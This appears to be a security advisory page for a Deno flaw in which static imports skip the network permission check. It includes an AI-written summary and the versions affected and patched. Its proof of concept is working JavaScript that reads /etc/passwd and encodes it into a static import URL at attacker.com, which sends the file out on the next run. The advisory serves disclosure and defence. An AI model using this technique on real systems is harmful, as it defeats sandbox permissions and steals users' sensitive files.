Deno vulnerable to Exposure of Sensitive Information to an Unauthorized Actor
Description
Summary
Static imports are exempted from the network permission check. An attacker could exploit this to leak the password file on the network.
Details
Static imports in Deno are exempted from the network permission check. This can be exploited by attackers in multiple ways, when third-party code is directly/indirectly executed with deno run:
- The simplest payload would be a tracking pixel-like import that attackers place in their code to find out when developers use the attacker-controlled code.
- When
--allow-writeand--allow-readpermissions are given, an attacker can perform a sophisticated two-steps attack: first, they generate a ts/js file containing a static import and in a second execution load this static file.
PoC
const __filename = new URL("", import.meta.url).pathname;
let oldContent = await Deno.readTextFile(__filename);
let passFile = await Deno.readTextFile("/etc/passwd");
let pre =
'import {foo} from "[https://attacker.com?val=](https://attacker.com/?val=)' +
encodeURIComponent(passFile) + '";\n';
await Deno.writeTextFile(__filename, pre + oldContent);
Executing a file containing this payload twice, with deno run --allow-read --allow-write would cause the password file to leak on the network, even though no network permission was granted.
This vulnerability was fixed with the addition of the --allow-import flag: https://docs.deno.com/runtime/fundamentals/security/#network-access
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Deno's static imports bypass network permission checks, allowing attackers to leak sensitive files like /etc/passwd when read and write permissions are granted.
CVE-2024-21486 describes a vulnerability in the Deno runtime where static imports are exempted from the network permission check [1][2]. This means that even when a user does not grant --allow-net, code executed with deno run can still make network requests through static import statements, violating Deno's security model.
An attacker can exploit this by crafting a script that reads a sensitive file (e.g., /etc/passwd) and then writes a new static import statement that includes the file contents as part of the import URL. This two-step attack requires both --allow-read and --allow-write permissions but does not require --allow-net [2]. The proof-of-concept demonstrates reading the password file and embedding it into a static import URL that points to an attacker-controlled server [2].
The impact is that an attacker can exfiltrate sensitive local files to a remote server without the user explicitly granting network access. This bypasses Deno's permission system and can lead to information disclosure [1][2].
The vulnerability was fixed by introducing the --allow-import flag, which provides granular control over static import operations [2]. Users are advised to update to a version of Deno that includes this fix and to review their permission grants carefully.
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
denocrates.io | < 2.0.0 | 2.0.0 |
Affected products
3Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
2News mentions
0No linked articles in our index yet.